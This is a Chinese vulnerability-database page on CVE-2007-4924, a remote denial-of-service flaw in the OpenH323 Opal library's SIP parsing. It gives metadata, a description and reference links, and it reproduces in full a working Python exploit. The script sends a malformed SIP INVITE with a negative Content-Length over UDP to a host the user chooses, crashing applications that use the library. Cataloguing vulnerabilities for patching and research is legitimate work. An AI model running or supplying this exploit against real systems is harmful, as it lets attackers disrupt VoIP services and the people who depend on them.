OpenH323 Opal库SIP协议远程拒绝服务漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118183 漏洞类型 输入验证
发布时间 2009-07-24 更新时间 2009-07-27
CVE编号 CVE-2007-4924 CNNVD-ID CNNVD-200710-134
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/9240
https://www.securityfocus.com/bid/25955
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200710-134
|漏洞详情
Openh323是为开发使用H.323协议在IP网上进行多媒体通信的应用程序而专门设计的全功能协议栈。Openh323的实现在处理畸形格式的SIP报文时存在漏洞,远程攻击者可能利用此漏洞导致用户的系统崩溃。OpenH323所使用的opal库的sip/sippdu.cxx文件中SIP_PDU::Read()方式没有正确地处理SIP报文头中的Content-Length字段,如果远程攻击者向使用了该库的应用程序发送了畸形的SIP报文的话,就可能向任意内存位置写入"\0"字节,导致拒绝服务。
|漏洞EXP
#!/usr/bin/env python
#
# OpenH323 Opal SIP Protocol Remote Denial of Service Vulnerability (CVE-2007-4924)
#
# opal228_dos.py by Jose Miguel Esparza
# 2007-10-08 S21sec labs

import sys,socket

if len(sys.argv) != 3:
	sys.exit("Usage: " + sys.argv[0] + " target_host target_port\n")
target = sys.argv[1]
targetPort = int(sys.argv[2])
malformedRequest = "INVITE sip:paco@192.168.1.134 SIP/2.0\r\n"+\
		   "Call-ID:f81d4fae-7dec-11d0-a765-00a0c91e6bf6@foo.bar.com\r\n"+\
		   "Contact:sip:pepe@192.168.1.133:5060\r\n"+\
		   "Content-Length:-40999990\r\n"+\
		   "Content-Type:application/sdp\r\n"+\
		   "CSeq:4321 INVITE\r\n"+\
		   "From:sip:pepe@192.168.1.133:5060;tag=a48s\r\n"+\
		   "Max-Forwards:70\r\n"+\
       	"To:sip:paco@micasa.com\r\n"+\
       	"Via:SIP/2.0/UDP 192.168.1.133:5060;branch=z9hG4bK74b76\r\n\r\n"		 

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((target,targetPort))
s.sendall(malformedRequest)
s.close()

# milw0rm.com [2009-07-24]
|受影响的产品
Ubuntu Ubuntu Linux 7.04 sparc Ubuntu Ubuntu Linux 7.04 powerpc Ubuntu Ubuntu Linux 7.04 i386 Ubuntu Ubuntu Linux 7.04 amd64 Ubuntu Ubuntu Linux 6.10 sparc Ubuntu Ubuntu
|参考资料

来源:REDHAT
名称:RHSA-2007:0957
链接:http://www.redhat.com/support/errata/RHSA-2007-0957.html
来源:SECUNIA
名称:27129
链接:http://secunia.com/advisories/27129
来源:SECUNIA
名称:27128
链接:http://secunia.com/advisories/27128
来源:SECUNIA
名称:27118
链接:http://secunia.com/advisories/27118
来源:MLIST
名称:[ekiga-list]20070917[ANNOUNCE]Ekiga2.0.10released
链接:http://mail.gnome.org/archives/ekiga-list/2007-September/msg00103.html
来源:bugzilla.redhat.com
链接:https://bugzilla.redhat.com/show_bug.cgi?id=296371
来源:BUGTRAQ
名称:20071011S21SEC-037-en:OPALSIPProtocolRemoteDenialofService
链接:http://www.securityfocus.com/archive/1/archive/1/482120/30/4500/threaded
来源:MISC
链接:http://www.s21sec.com/avisos/s21sec-037-en.txt
来源:MILW0RM
名称:9240
链接:http://www.milw0rm.com/exploits/9240
来源:OSVDB
名称:41637
链接:http://osvdb.org/41637
来源:openh323.cvs.sourceforge.net
链接:http://openh323.cvs.sourceforge.net/openh323/opal/src/sip/sippdu.cxx?r1=2.83.2.19&r2=2.83.2.20
来源:UBUNTU
名称:USN-562-1
链接:http://www.ubuntu.com/usn/usn-562-1
来源:SECTRACK
名称:1018